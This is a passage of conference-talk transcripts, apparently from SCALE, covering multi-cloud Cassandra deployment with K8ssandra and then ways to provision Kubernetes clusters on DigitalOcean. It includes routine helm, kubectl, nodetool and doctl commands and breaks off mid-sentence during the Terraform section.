One of the biggest things about NoSQL is that it's really about horizontal scaling: commodity hardware, cheap hardware, but tons and tons of it, so that even when failure happens — and it's going to happen in distributed systems — you can still deal with it, because the data is replicated, and as a developer you don't need to worry about any of that. It's all taken care of for you automatically. That is, in general, the philosophy of NoSQL. Of course, each of the different platforms varies a little, but we'll look at that in just a second. There are a lot of examples: Cassandra, Mongo, Couch, HBase, Couchbase, and so on. In general, it's about horizontal scaling, because with a relational database you can scale up and up and up, and at some point it's going to keel over and fall, right? There are ways to spread your data across a relational database, but they're very clumsy and awkward; a lot of the time you have to do it manually, and it's never foolproof. NoSQL, on the other hand, was conceived with the idea that in distributed systems failure is going to happen, so the database says: I'm going to spread the data across nodes, and I will worry about how to spread it — I might use some kind of consistent hashing algorithm — don't worry about it, I've got it for you, right? And what happens when some piece of data you're trying to access isn't available at that moment? Those are the things the NoSQL database deals with. It was really meant for the cloud even before there was a cloud — that's how I put it, okay? Some of you might have heard of the famous CAP theorem, sometimes referred to as Brewer's Conjecture. Essentially, what it says is: when everything is running fine, everything is fine — I can have consistency, I can have availability, and I can have partition tolerance, all at once. But when a failure happens, you have to pick two of the three, okay? Unfortunately, you have to give up one of them: either consistency, or availability, or partition tolerance. You can't have all three at the same time. And it turns out giving up partition tolerance is probably worse than giving up consistency, because when a partition takes the system down, even my grandmother can notice that's a problem, right? Consistency, on the other hand, has this concept of eventual consistency, where things might seem a little off for a moment, but it's really not a big deal, because eventually they become consistent. And it turns out that even for fairly sophisticated distributed applications, eventual consistency might be good enough, okay? But you really don't want to sacrifice partition tolerance, and we'll see where Cassandra fits in. Obviously, partition tolerance is extremely important, and Cassandra is an AP system. As you can see here, most NoSQL systems do not give up partition tolerance; they may give up availability or consistency instead, right? And really, Cassandra isn't just eventually consistent, either.
You can actually make it what we call tunably consistent — some people may not like that term — but essentially you can say: I want strong consistency. The trade-off is that the system may then not be available, because if I want an acknowledgement from all of the replicas, typically the system may not be able to take that particular transaction, that particular write. One of the key things about Cassandra is that there is no single point of failure, and there is really no such thing as a master. You can call it a peer-to-peer architecture if you will; a lot of the time you'll have seen the ring associated with Cassandra, and essentially every node is treated the same, okay? All of this is important to keep in mind when you're building a multi-cluster Cassandra, because this architecture makes it so much easier to build one. And in a lot of ways, remember what Kelsey Hightower said: Kubernetes is really not a platform, it's a platform for building platforms, right? So likewise, whether the multi-cluster concept works really depends on the application or platform you're building on top of Kubernetes, and whether it can take advantage of it. In the case of Cassandra, it's actually pretty straightforward. Why do you need to partition? Because you can't fit all the world's data in one node, right? So you distribute it across multiple nodes and you shard the data. But sharding is hard, right? And that's where the NoSQL platforms shine, because most of the time you as an application developer don't need to worry about any of it. There were some NoSQL systems, at least in the early days, where you did have to worry about the sharding, but really, friends don't let friends shard. It's hard, okay? All right. Cassandra, like I said, is configurably consistent, which is probably a more palatable term than tunably consistent. There are a number of ways to do this, and like I said, you can require consistency of ALL, in which case every replica has to reply, and so on. This next part is not so much about putting logos on a marketing slide; the point is that some very large-scale Cassandra deployments — thousands of nodes — are running as we speak at big companies like Netflix, Apple, and so on. Apple is still a contributor to Cassandra. It's really about scale, and one place Cassandra shines is linear scalability. There was a study where they went from 100 to 1,000 to 10,000 nodes, whatever, and it was just linear — no fall-off, no drop-off at any point, which is very hard to do even in a horizontally scalable system, right? So, what about K8ssandra? K8ssandra is Cassandra running on Kubernetes, right? And a colleague of mine, Chris Bradford — a great guy — was formerly a skeptic of running any database on Kubernetes, and that was probably fair in the early days of Kubernetes, when a lot of things weren't quite production quality, however you want to put it. And there are still a couple of things that aren't easy to do, even with Cassandra. But long story short, Chris Bradford now works for DataStax, he's a big proponent of K8ssandra, and you will see it in action today, okay? So, what is K8ssandra?
Again, it's a cloud-native, scalable data tier, as Matt talked about in his talk yesterday. Basically, it's not just about the day-zero tooling; it also provides day-two tools: backup and restore, being able to repair nodes, getting metrics with Prometheus and Grafana, and being able to do ingress using Traefik or NGINX and so on. All of this is provided in a way that's easy to install, easy to manage, and easy to administer, okay? So, as you might expect, what does the installation look like? You add the repo — helm repo add k8ssandra plus the repo URL — you update, and then you install. That's it; it's as simple as that, right? You can tweak some values, very straightforward: you can say, well, I don't want Stargate — Stargate is a unified API, and you'll see it in a second — so you can pick and choose the components you want. In the case of a multi-cluster install, or a multi-availability-zone install, you can say: I want my data centers to be rack-aware, spread across different racks, for a higher level of availability — so even if a particular rack goes down, you shouldn't have a problem. And then, of course, you can go further up from there and do multi-region, or multi-cluster, or multi-cloud as well, okay? But the philosophy is generally the same. You can install it on pretty much anything. I think I've done pretty much everything: I've done Kind, I've done Minikube, I've done Civo, GKE, AKS, and EKS as well. Really, you can install K8ssandra on pretty much anything you want. It's very cool, because if I want to do some local development, I do it mostly on Minikube or Kind — mostly Kind — and then I try everything out and finally deploy it on GKE or wherever. In fact, our K8ssandra operator docs actually walk through installing on a Kind cluster, and you can extrapolate from that to multiple regions, multiple clouds, and so on, okay? By the way, does anybody have a K8ssandra install? One. I hoped you did. Yes — here's someone with a thousand-node cluster who'll be glad to talk about it. Yeah. So, K8ssandra comes with a bunch of components. Obviously, Cassandra is at the heart of everything, right? And then we have a unified API called Stargate. With Stargate, as an application developer, it's really cool: you can use a document API if you want, or you can use CQL if you want — CQL is the Cassandra Query Language; it's kind of similar to SQL, but a little different, right? And then, of course, you can do gRPC or GraphQL as well. It's a unified API, which is, again, very cool. Then we have two more components, Medusa and Reaper — Reaper being the one that basically does the repairs — and then, of course, Prometheus and Grafana. All of these are installed as Helm charts, okay? All I do is install the cass-operator, and then all of these are automatically installed for me. You can see here: I install the cass-operator, and I get a REST/document API endpoint, plus Swagger, plus a GraphQL endpoint; I get the Reaper UI; I get a CQL endpoint; I get Traefik — all of this, very easy to install, okay? And we have some sessions from KubeCon.
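(For reference, the Helm flow just described boils down to a few commands. This is a minimal sketch: the release name and the value overrides below are illustrative, and the exact chart values vary by chart version, so check the docs at k8ssandra.io for your setup.)

```bash
# Add the K8ssandra chart repo and install -- a hedged sketch of the
# flow described above; the release name and overrides are illustrative.
helm repo add k8ssandra https://helm.k8ssandra.io/stable
helm repo update

# Install, picking and choosing components via value overrides.
helm install my-k8ssandra k8ssandra/k8ssandra \
  --set stargate.enabled=true \
  --set reaper.enabled=true

# Watch the pieces come up.
kubectl get pods
```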
If you're interested in the install, you can walk through those, but k8ssandra.io — and I'll point you at it — has wonderful docs, and all I do is refer to those. So, that was a lot of introduction to Cassandra and K8ssandra, and we haven't even gotten to the multi-cloud aspect yet, right? So let's get to the multi-cloud cluster. The reason the K8ssandra operator was born was that we started hitting some limits with Helm. Can you bend Helm and make it work? Probably, but it just wasn't right to do it that way. So we went ahead and built a new operator, the K8ssandra operator. There's a great discussion by Jeff Carpenter and John Sanda, who is basically our tech lead for K8ssandra, where they walk you through this. If you have some time — it's just a discussion — it covers why Helm, what limits we hit with Helm, why a new operator, and what an operator even is, because for some time the Kubernetes community kind of looked down on operators in general; there were a lot of perception issues associated with them. But now it looks like the Kubernetes operator has come back into style, right? It's still very relevant, because it's really about the same Kubernetes concepts we always talk about: it's about self-healing, it's about being able to watch what's happening and take appropriate action based on that, whether that's corrective action or some other action. So if you have some time, take a look at it: why we pushed Helm to the limit and then built an operator. It's a four-part series, so you'll get all the details. So, why multi-cluster? Cassandra has always been designed for multi-region; we thought about multi-region right from the beginning. Each node of the cluster maintains the full topology. It talks to the other nodes via the gossip protocol and routes traffic to its neighbors; it has an idea of what the neighbors are doing because they're all talking to each other, and all those good things, right? So in a way, each node understands the others. Kubernetes, on the other hand, was not designed for multi-region, and a lot of that goes back to the networking design, where you assume that each pod is able to talk to every other pod — and, more so, they all need to be on a flat network, right? So it becomes a little hard to do. And for my multi-cloud setup — there are a number of ways of achieving multi-cloud, for sure — what I did was use something called Aviatrix. I don't know if any of you have used Aviatrix or are aware of it. I'm not getting paid by Aviatrix; I just liked it, and I have actually submitted a proposal for KubeCon North America to build a multi-cloud cluster — to do this in action — in 90 minutes, okay? Which is what I'm going to show off in a little bit. So the K8ssandra operator is really designed to make it very easy to do this multi-region, multi-cloud — I'm always missing one — multi-region, multi-cluster, or multi-cloud, okay? It doesn't really matter; the K8ssandra operator will handle it. And if you're not doing multi-anything, it will still work, but the K8ssandra operator has a lot of advantages there. The cass-operator, on the other hand, is great for a single cluster, right?
From a Kubernetes perspective, that is. But the moment you get into a multi-cluster scenario, the K8ssandra operator has this concept of a control plane that takes care of the data planes, kind of similar to how many Kubernetes services operate. It supports multi-data-center, multi-region K8ssandra clusters. It consists of a control plane and data planes, right? The control plane creates and manages the objects — again, through the API. The control plane right now, unfortunately, can only be installed in a single cluster, so it's not highly available. That's coming, but it's not there yet — do we know when it's coming? No, okay. The data plane, though, can be installed in any number of clusters. In this case, what I've done is use AKS as my control plane, and I've installed the two data planes on EKS and GKE, okay? And you will see that in action today. So how does this magic really work? There's a little bit of a chicken-and-egg here, where the control plane needs to understand the data planes, right? So what you do is inject the configuration of the respective data planes into the control plane. There is a way to inject the configuration, and once the control plane knows the configuration, things become a lot easier from an installation perspective. And then, once you install Cassandra, you really don't need to do anything, because the nodes know about each other, they're able to talk, gossip around, and build a bigger cluster, okay? So here's an example of a K8ssandraCluster object used to build a multi-region Cassandra cluster. You can see there are actually two configs I'm using — two Kubernetes contexts. One is east and the other is west, okay? So essentially what I'm saying is: one data plane is going to be on east, the other data plane is going to be on west, and these are the contexts to use. And you will see all of this again when I dissect my installation, okay? So, essentially, two contexts are injected into the control plane: one called east, the other called west. Once it has the Kubernetes contexts, it's able to go install Cassandra there, and then, by the nature of how Cassandra operates, it's able to form a bigger cluster. This next slide shows the same thing, and this is roughly what the client config looks like, but we don't need to worry too much about it, okay? And what we'll do is jump straight into the demo. So, remember my journey: my travails started with GKE, where I set up the multi-region Cassandra. That was very easy to do, because networking in GKE is a lot easier: it has addresses reserved for pods and addresses reserved for services, and all I needed to do was take the address of the seed service from one cluster and inject it into the other, and then it formed a big cluster — kumbaya, all done, right? But I'll skip that demo and go to the next one, which is the EKS demo, okay? And hopefully you can see it in the back; otherwise, I'll explain it. Essentially, what EKS KubeFed does — and it's a fantastic project, really, if you have not used it before — is provide me with exactly what I wanted.
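(Before the demos, here is roughly what that K8ssandraCluster object looks like, as a sketch applied from the control-plane cluster. The context names east/west, the DC names, the storage class, and the sizes are all illustrative, not taken from the talk's actual manifests.)

```bash
# A hedged sketch of a multi-context K8ssandraCluster; all names and
# sizes below are illustrative placeholders.
kubectl apply -f - <<'EOF'
apiVersion: k8ssandra.io/v1alpha1
kind: K8ssandraCluster
metadata:
  name: demo
spec:
  cassandra:
    serverVersion: "4.0.1"
    storageConfig:
      cassandraDataVolumeClaimSpec:
        storageClassName: standard   # cluster-specific; adjust for your clouds
        accessModes:
          - ReadWriteOnce
        resources:
          requests:
            storage: 5Gi
    datacenters:
      - metadata:
          name: dc-east
        k8sContext: east   # one injected data-plane context
        size: 3
      - metadata:
          name: dc-west
        k8sContext: west   # the other injected context
        size: 3
EOF
```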
Back to what I wanted: I knew I was going to make mistakes. I knew I was going to stumble. So I wanted something repeatable, right? And at that point there was no K8ssandra operator; I had to inject the seeds myself and do a whole bunch of manual stuff. So I was lucky to find this EKS KubeFed project, which is actually maintained by Amazon. But like I said, the whole KubeFed thing is kind of falling out of favor. What EKS KubeFed does is provide me with these two VPCs. As you can see in this particular example, you have 172.21 running in one region and 172.22 in the other — I believe it's eu-central-1 and eu-west-1. So Frankfurt is running 172.21, and Dublin — eu-west is Dublin and eu-central is Frankfurt, whatever, okay? We'll see all of that in a second. It also provides me with a bastion host — a bastion host is a way to connect to these respective hosts if I want to — and the bastion host is installed for me on 172.20, okay? It's all opinionated, but that's fine by me, because it works, and I'm not a networking geek by any means; I just wanted it to work. So I had 172.20, 172.21, and 172.22, and what I did was install Cassandra on 172.21 and inject the seeds into 22 — exactly the same thing — and they formed a bigger cluster, and, you know, good to go, okay? And you'll see this in action. But with the introduction of the K8ssandra operator, I don't have to do any of that, because it does, in principle, the same thing: it knows the seeds and essentially lets the gossip protocol do its work, okay? That's exactly what the K8ssandra operator does, and we'll see that in action as well. So, this slide talks about all the different components and contexts and so on, but let's skip all that. And I don't know why this other slide came in here — I need to get rid of it; don't worry too much about it. Let's go into the demo. Okay, so what I want to show is a little bit of everything. Let me actually start with the EKS demo, keeping my fingers crossed — live demos are always very interesting, especially when I'm connected to a network called "SCALE public slow," because my "SCALE public fast" did not work. So, you know — anyway. All right, let's go into my instances. Okay, so here are my instances. I have my CoPilot, my controller, and all that, which I'll get to in a second, but we're still looking at the EKS demo, where I did the manual injection of seeds myself, okay? So I'm going to try to connect to it. Remember what this is: the bastion host, right? I'm connecting to the bastion host — that's all I'm doing. Let me connect to that... and I'm good to go, okay? So now I'm going to do a few things. Let's look at — I'm blanking for a second on the kubectl commands — let's do get-contexts; that'll get me going. Okay, so here are the two contexts, one is my ragsns fed2 one and the other fed2 two, okay? So let me set the context — or use the context, whatever it is. Is it set-context or use-context? I can never figure that out, okay? And just to make sure: get-contexts — okay, that's good. So now let's get the nodes.
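(The context dance here looks roughly like this; the context name is illustrative. For the record, the subcommand he's reaching for is use-context: set-context edits a context's settings, use-context switches to one.)

```bash
kubectl config get-contexts          # list the two federated contexts
kubectl config use-context fed2-2    # switch to the second cluster (name illustrative)
kubectl get nodes -o wide            # INTERNAL-IP shows which VPC you're in (172.21 vs 172.22)
```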
And you'll see here, this one is running on 172.21 — this is the west one I was talking about, basically running in Dublin, or whatever the case may be, okay? Now, if I do the same thing with context two, you should see 172.22, okay? And all of this was automatically done for me through EKS KubeFed, which is really cool, right? So let's look at some pods — and it doesn't really matter which cluster; I can look at any of this, right? You'll see here you have Grafana, you have Prometheus, you have the Reaper operator — basically all of this was set up using the cass-operator, right? Pretty straightforward. Then you have a bunch of CRDs and all that, which we'll look into in a second. You'll see here there are a number of different racks — rack one, rack two, and rack three, okay? And the way I set that up was — let's take a look at DC West, okay? You'll see here that I injected the seeds from Central, which was the other install, right? And then what I did was also specify the racks, and you can provide the affinity. So basically I'm saying that one node runs in availability zone 1a, another in 1b, and another in 1c, okay? So it's a three-availability-zone cluster, and that's pretty much how I set this all up, okay? Now, for those of you who are Cassandra admins and still don't believe this is a multi-node, multi-cluster Cassandra: you can run something called nodetool, okay? Basically, what this command says is: exec into the Cassandra container and run the nodetool utility within it, providing the username and password — and don't ever use admin and password like I do; this is just for illustration, right? So you will see here that I have two data centers, DC1 and DC2, okay? Can everybody see that? And you can see this node is running on 21, okay? In the status, U stands for up and N stands for normal, so "UN" means the node is up and operating normally, okay? You'll see nodes on 172.21 and 172.22, and if you actually get the nodes with the wide output — no, is it going to show the topology? I forget, but if you dig through or describe, hopefully this will — you'll see they're in 1b, 1a, and 1c, okay? And if I do the same thing with the other one, you'll see it's a little different — not a whole lot — it's running in eu-west, zones a, b, and c, okay? So it's already rack-aware, and now what we've done is make it region-aware as well, okay? So if some calamity happens in West, all of this can shift to Central, and you know the drill, right? So that's as far as the EKS KubeFed experiment goes. Now I wanted to go really multi-cloud. I wanted to do it across clouds, and you will see here what I've done — this is using Lens, okay? I have three clusters here: one on AKS, another on EKS, and the third on GKE, okay? These three are used by the K8ssandra operator, starting from AKS — I just picked one, right? — and essentially it installs onto EKS and GKE, okay? But to be able to do that, I used something called Aviatrix, okay?
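(Before moving on to Aviatrix — for the Cassandra admins, the nodetool check narrated above might look roughly like this. The pod name is a placeholder following cass-operator's usual naming, and, as the speaker says, don't actually ship admin/password.)

```bash
# Exec into the Cassandra container and run nodetool with JMX credentials;
# pod name and credentials below are placeholders.
kubectl exec -it demo-dc1-rack1-sts-0 -c cassandra -- \
  nodetool -u admin -pw password status
# Each datacenter is listed separately; "UN" next to an address means Up/Normal.
```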
So, back to Aviatrix: I used its Terraform scripts, and I'll point you to them as we go, okay? Basically it's the AVX multi-cloud Kubernetes setup, and it does an opinionated implementation: you just specify the names for your AWS, Azure, and GCP accounts, and it goes ahead and creates the appropriate things. For example, if you look at — I believe it's variables.tf — you can see the AWS CIDR is 10.1... do you want me to increase the font? Yeah, sorry about that, I forgot, okay? So you can see here it's 10.1 for AWS, 10.2 for Azure, and 10.3 for GCP, okay? And you'll see that as we dig into it. So it stands all of this up, and the nice thing is that you can tear it all down as well, right? Which is something I needed to be able to do. And then — I think the readme talks about this — essentially all I need to do is point it at my account and the name of the controller, okay? So let's take a look at the controller. To do that, I'll go back to the EC2 instances, look at the AVX controller, and connect to it — action, open the address. "Not secure" — that's fine, I don't care. It gives you an idea of which accounts I've onboarded — AWS, Azure, and Google — what the gateways are, and so on. What I want to show here is the multi-cloud transit, I think, or the multi-cloud gateway — one of the two; I can never remember. So if you look at the gateways, and I just filter on CIDR 10, you'll be able to see AKS, EKS, and GKE, okay? And you'll see they're on 10.2, 10.1, and 10.3 respectively — it's basically an opinionated implementation, okay. So now that we've seen how I set it up with AVX, what I'm going to do is go into my cluster. To do that, I'll just go to Lens, which is kind of cool because I don't have to type any of the kubectl commands, right? And here's my Azure cluster. What I'll do is take a look at some of the pods — take a look at the K8ssandra operator — and somewhere here it should have a label saying control plane is true. You can never find these things when you want them. Let me look at the deployments instead... that's not good either. But believe me, it's in there somewhere, okay? Actually, let's look at the custom resources. And you'll see here, this is the K8ssandraCluster that was created, okay? And the name of the K8ssandraCluster is ragsns, okay? You'll see these are the contexts that were injected — dc-gke and dc-eks — and these are the data centers that exist. So, for example, if I go to EKS — let's go to EKS — and look at the pods, you should be able to see a DC. You can see here, this is the DC that got injected into the configuration, okay? In fact, if I go back to Azure, which is really where I started, I can take a look at the client configs. You can see the two clusters injected here, right? Here's my EKS AVX cluster and my GKE AVX cluster, okay? And that's kind of how I made it happen.
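(Poking at the same objects from the control-plane context without Lens might look like this; the operator namespace is its usual default and is an assumption here, as is the expectation that your install used it.)

```bash
kubectl get k8ssandraclusters -A                  # the K8ssandraCluster CR (here, "ragsns")
kubectl get clientconfigs -n k8ssandra-operator   # the injected data-plane contexts
kubectl get cassandradatacenters -A               # per-context DCs the operator created
```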
And again, I think a lot of this was already built into Cassandra, so I didn't really have to do much other than work on the networking. Once I got the networking going, everything was pretty straightforward to make happen. And now, with the K8ssandra operator, which is really about multi-cluster, multi-cloud, and so on, it's a lot easier to do a K8ssandra install, okay? So with that, I'm almost at the end of my presentation. Let me get back to my slideshow — let me jump randomly to slide 30. Okay, that's good. All right, so I'm done with the demos. We saw the EKS KubeFed demo, and we also saw the multi-cloud demo installed from AKS — I probably should have shown you a little more of the command line, but I'll skip it today; we really don't have much time. And with that: if you want to head over to k8ssandra.io, it has pretty good docs, actually — surprisingly, for something this technical, it's pretty straightforward to install, whether you want to install on Minikube, on Kind, on Civo, really anywhere. I myself wrote a blog post about multi-region Cassandra on EKS using KubeFed, so you can take a look at that; it essentially goes through the same demonstration I did today. But like I said before, we also run workshops every Wednesday; you're welcome to attend. I tell everybody that we're living in the golden age of developers, right? We really have all the power as developers, so it's up to us — yeah, exactly — it's really up to us to take full advantage of this, maximize our income, whatever. But do attend; we also hand out badges, and for whatever reason these badges are extremely popular, okay? We also have a pretty robust discussion going on in Discord. In the workshops we have a lot of chat going on, but that's primarily on YouTube; if you want something a little more permanent, jump onto Discord and try that out. Like I said, there's a whole bunch of these: if you're interested in an introduction to NoSQL, or in building your own TikTok clone, or if any of you are interested in a Swift workshop — Swift is Apple's open-source client- and server-side programming language — you can try all of those, okay? So, like I said, the badges are extremely popular, and they look cool, so try it out. And with that, thank you very much. Great — we still have 10 minutes. Thank you very much, Rags. I am so happy you were here. We have time for maybe one or two questions, if you're able. Absolutely. Are there any questions in the room? Oh, yeah, I'll come over. Thank you for the presentation, Rags, and for the multi-cloud, multi-region deployment. As an organization planning to go to production, do you have any advice on reducing costs, say when going from one provider to another? I'd just like to hear your thoughts. Yeah, yeah. I jokingly say that I'm a developer advocate and I really don't concern myself with costs, which is really a bad thing to say, you know? But maybe somebody in the audience has better guidance, especially from a cost perspective. Anybody want to jump in, especially from a multi-cloud perspective, as I understand it? Anybody?
Otherwise, I really don't have good guidance — my apologies. No? Okay, sorry. So the question-and-answer session didn't start very well, but we'll keep going. Well, sounds like we have time for one more question... all right, in that case, I would like to thank you again. Thank you. Thanks for this awesome thing. We will be back in 10 minutes for the last presentation of the day, which is a little more beginner-focused and covers four ways to spin up a Kubernetes cluster. Hope to see you there. And, as usual, it's SCALE — talk to people, everyone's friendly. [off-mic setup chatter and mic checks between sessions] Come on in, have a seat, make yourselves comfortable. We're just waiting for a little bit of AV setup before we dive into our last talk of today, Friday at SCALE. Yes. Hello, test. Cool — and with those final setups: thank you so much. Welcome, everyone. This is the closing talk for the Cloud Native Day this Friday at SCALE. I am super excited to introduce Daniel Hicks, who is going to show all of you four ways to spin up a Kubernetes cluster. We've been talking about having clusters living on our machines all day long — every single presenter is like, "I already have a cluster." Well, here we are: this is how you get to that stage on your machine. Please welcome Daniel. Thank you. All right, hello, everybody. As she said, my name is Daniel Hicks. I am a software engineer at DigitalOcean on the storage platforms team, and this is Four Ways to Spin Up a Kubernetes Cluster. Just a quick who-am-I: as I mentioned, I work at DigitalOcean on the storage platforms team. We do a lot with Kubernetes on my team, hosting sort of an orchestration platform for our storage products. I graduated from West Texas A&M — go Buffs — and I'm also a current computer science student at Georgia Tech for my master's. I also really enjoy open source; some of my first projects were contributing back to the .NET runtime, as well as GitHub Desktop and the External Secrets Operator for Kubernetes. So, jumping right in. Often, companies measure your Kubernetes maturity, per se, in terms of day-one versus day-two operations, where day one is getting your feet wet: booting up a cluster, deploying applications into it, testing things out, seeing what works, possibly automating some of that. The more mature model is day two, where you have things like automatic logging and monitoring, ingress and egress, as well as backups, hardened security, things of that nature. And so we're going to focus on getting from day one to day two, since that process can take not only days, as the name suggests, but weeks, months, or sometimes even years. So we're going to talk about how to speed up, or accelerate, getting there.
And we're going to do that by using things like a managed Kubernetes service, as well as picking the technique that best fits your process for spinning up clusters. So, this is what we're going to cover today — the four different ways. First, the web interface: most clouds have one, so we're going to specifically use DigitalOcean's Kubernetes interface. We're also going to use the command line to boot up a cluster, and then look at Terraform and Pulumi to boot up a cluster. And my disclaimer: everything here will be focused on DigitalOcean's Kubernetes platform, because it's the one I have access to. I will say, though, that every method we're demoing today is also available on any other cloud platform — AWS, Azure, and Google Cloud all have their own web interfaces and CLIs, and they all have their own openly available providers for Terraform and Pulumi. So this applies to everything, not just what we're showing today. So, first off, the web interface. And because I am a wimp, I recorded my demos — you never know what can happen with live demos. And that's awesome. All right, so we're going to keep this small. This is just doing it through the web UI. You can see this is going through and picking the various options on DigitalOcean — slightly hard to see, since it's small, but you can do things like choose your own cluster size: how many nodes, and how big you want the nodes to be. There are several other options, such as region, or whether you want the highly available control plane. So this is a very quick, very visual way to do it; you don't need to be super technical, so if you're working on a proof of concept, it's very simple to do — just a real quick way to get into it. And the rest of this is showing the cluster booting up, as well as how to get connected. Normally you would download something like the kubeconfig file, which you put on your machine to get access to the cluster, and most cloud providers also offer some form of UI to interact with the cluster. This one specifically shows the regular, default Kubernetes dashboard — what you'd get if you booted up Kubernetes on your home machine or something of that nature — which is what we provide at DigitalOcean. And here's the dashboard we provide from that, showing the various pods inside the cluster; nothing too crazy or new. Let's see if we can get the slideshow to work. All right: the pros and cons of this way of doing things. Like I mentioned, it's very fast to get started — you can boot it up right away, just a couple of button clicks, nothing too fancy. It's very visual, for people who like learning visually. I myself really like graphical interfaces, but that's just how I roll; how I learn and do things best might not be great for you. But like I said, it's very easy to spin up and down. A huge downside is that it's hard to share this among multiple people: how I click the buttons and which options I choose — you only know about that from me. I can tell you how I did it and you can try to do the same, but you might get something different; you might end up with a different configuration. In that sense, it's very hard to repeat the same thing over and over again. Also, clicking through the buttons takes time.
So it's very hard to do over and over again, and the configuration is stuck in my head: if I go on vacation, you have no idea what I did, and there's no way to get it back — it's stuck with the creator. It's best for prototyping something very quickly: if I just need a cluster to show you something cool, or to check the install of, say, a new operator or something of that nature, it's 100% perfectly fine for that. It's also good for comparing the different cloud providers: say I want to know what AWS's interface looks like versus Google Cloud, or DigitalOcean versus Azure. It's very good for that, and you can see what fits your needs best. It's also okay if you're willing to accept the technical debt that comes with not being able to store that configuration — either as something you're going to automate later, or something you're okay with up front. And so next, we're going to go over the command line. Most cloud providers provide some form of command line to interact with their services. We are no different: we provide a tool called doctl — the "do-cuttle" tool, or however you choose to pronounce it. So here you can see I'm interacting with our Kubernetes service. I'm saying I want to create a cluster called "my awesome CLI cluster" — minus some screen jittering — with a count of three nodes. This does take a little bit, but through the magic power of editing we'll see this speed up fairly fast, and we're going to jet right to the end. And then doctl does some extra fun things: it will actually download the kubeconfig onto your machine and change your current kubectl context to the cluster you just created. This is usually beneficial just for getting quick access to things, so then we can just run kubectl, and you can see that we have pods in all of our namespaces, and things of that nature. So, the pros and cons of this: very similar to the UI. It's fast and easy. It's also really developer-friendly — for those who like working in the terminal, this is the way to go. It's also somewhat possible to automate: Bash scripts are a thing, and you can very easily put this in a file that somebody can run, feeding in the inputs. The downside: it's still somewhat difficult to share configuration. While it is an automatable script, there is no state, per se, of what is actually up and running. Say you have developers booting this up every time they enter development mode — there could be 10 clusters running, and the command line doesn't know this. The cloud provider might provide a way to list all the clusters, or it might not; it depends. As well, if you're moving between cloud providers or switching contexts fairly often, their CLI tools are going to be vastly different from each other: they all have different interfaces, they all provide different services, everybody names things differently. It just won't be consistent from provider to provider — AWS and Google Cloud each do things differently from how any other cloud provider does things, and so on. Since the pros are very similar, the best uses are very similar: quick prototyping, proofs of concept, and understanding the cloud provider's API. You saw that with doctl's Kubernetes commands, all of those command-line arguments are almost identical to the REST API we provide behind the scenes, which is literally all this is calling.
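(The CLI demo above amounts to something like this; the region and size slugs are illustrative — doctl kubernetes options lists the real ones.)

```bash
# Create a three-node cluster; doctl saves the kubeconfig and switches
# your current context when it finishes. Slugs below are illustrative.
doctl kubernetes cluster create my-awesome-cli-cluster \
  --region sfo3 --size s-2vcpu-4gb --count 3

# Because the context was switched for us, this now points at the new cluster.
kubectl get pods --all-namespaces
```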
So if you need to get familiar with a cloud provider's API, CLI tools are usually a very good way of doing that. And as I mentioned, it's also very good for writing very basic automation: spin up a real quick cluster by running a Bash script, et cetera. And so next we're going to view a slightly more automated, consistent way of doing things. The first two were more of a day-one operation; we're going to focus more on day two for the next two. Yeah. All right, let's figure this out... it's when your computer's working real hard. Let's find out. All right, do not move. I'm also going to fire up my machine; please hold tight. All right. Oh, yeah, you're welcome. Quick poll: who pronounces it "kube cuddle"? Who pronounces it "kube C-T-L"? Wow, clear preference here. Any other pronunciations? Kube control? Kube control, right — why did I not think of that? Anything else? Kube cussle? Kube cussle. Oh, yeah — well, because sometimes you just have to cuss at your computers. That is super reasonable. Let's see. All right: why did the robot cross the road? Why? Because it was programmed by the chicken. I learned that from my 10-year-old. How are we doing over there? Do we want a different computer? Last time it was a computer — well, we had some issues with, like, a 2015 or earlier. Anyway, thank you all for your patience — and see, I tried to record the demos just so I could avoid technical difficulties. Go figure. All right, so as I was saying: the first two, the web interface and the command line, were focused more on the day-one model of maturity in terms of Kubernetes. The next two, Terraform and Pulumi, are focused more on accelerating to day two — the day-two maturity model of booting up Kubernetes clusters. So, this video — well, if it's too small, I can't really do much. First off, we're just going to cat some files and look at them. This shows the provider Terraform file you would write for the DigitalOcean provider in Terraform; it mostly just says what the provider is and the version we're going to use. The next one is, I believe, the actual Kubernetes cluster we have defined in Terraform. You can see I'm defining a resource — a Kubernetes cluster that I call "my cool cluster." I'm putting it in the region sfo3, as well as declaring its name — the name that shows up in the UI — and a node pool, specifying the specific node size and how many I'd like. And this is just showing that, for this method, you do need a DigitalOcean API token, which is the same thing you'd need with the CLI, but I've already set it up, so we're not going to worry about that. Usually, first you have to run terraform init — there are some initial steps; this goes and downloads the provider and anything else you might need that Terraform can configure for you. And then, right from there, we run terraform plan. The nice thing about Terraform is that it actually shows you what it's going to do: what it's going to create, the state it's going to collect, as well as the things it will only find out after it creates the resource. This will make an API call to DigitalOcean to create a cluster and return any state it might need, such as the private networking ID and things of that nature. And so we'll run terraform apply.
It'll ask us if this is what we truly want, and of course we'll say yes. Again, through the power of editing, we're going to fast-forward through this, since provisioning Kubernetes clusters sometimes takes three to ten minutes, depending on the options you chose, the size, et cetera. You can see us speeding through it, but behind the scenes this is fetching the state, waiting for the cluster to be ready, and finishing up — so we'll skip the last couple of seconds. Once it finishes, it tells you it created a resource, and then we can just run the doctl command we ran earlier to save the kubeconfig down to our local machine and merge it with the kubeconfig that's already on our computer. And then, very quickly, kubectl to show I'm not fibbing: we do have a cluster up and running. We're just going to get all the pods in all the namespaces — you can see a bunch of pods; we install Cilium by default, as well as some DO agents we use to monitor the cluster. So, the pros and cons of this method. One of the cool pros, I think, is that you can preview your infrastructure. You can put fairly complex logic in here, so what you're booting up might not always be super obvious; running terraform plan, you can see everything you're about to boot up, along with the initial state that Terraform can know at that time. This also introduces the concept of infrastructure as code: your infrastructure is no longer something that lives only inside the cloud. You can check these files, as well as the state, into source control. You can also store the state out in something like S3 — or DigitalOcean Spaces, if you like DigitalOcean products. It's also very repeatable and auditable: there are plenty of tools out there that can audit Terraform, as well as monitor how much you spend in the cloud based on your Terraform state, and things of that nature. So you can get fairly diverse with Terraform and with monitoring as you go. The downside: this does require slightly more effort than typing a simple command into the command line, and you have to have somewhat technical knowledge of the cloud provider you're using. You could see that I specified the exact slug for the machine size I wanted for my node pool — you have to know these things about your cloud provider if you're going to do this. It might not always be obvious that you need to create a node pool along with a Kubernetes cluster, because the UI automatically does it for you, as does the command-line tool. So you have to have some knowledge, dig through the docs a bit more, go find the provider, and hope there's good documentation for it. But this is usually best for clusters used by multiple people. For teams of people, this is very good, because you can share the state among them: if somebody goes to boot up a Kubernetes cluster, or to change something, Terraform — if you're using shared state — will tell them, 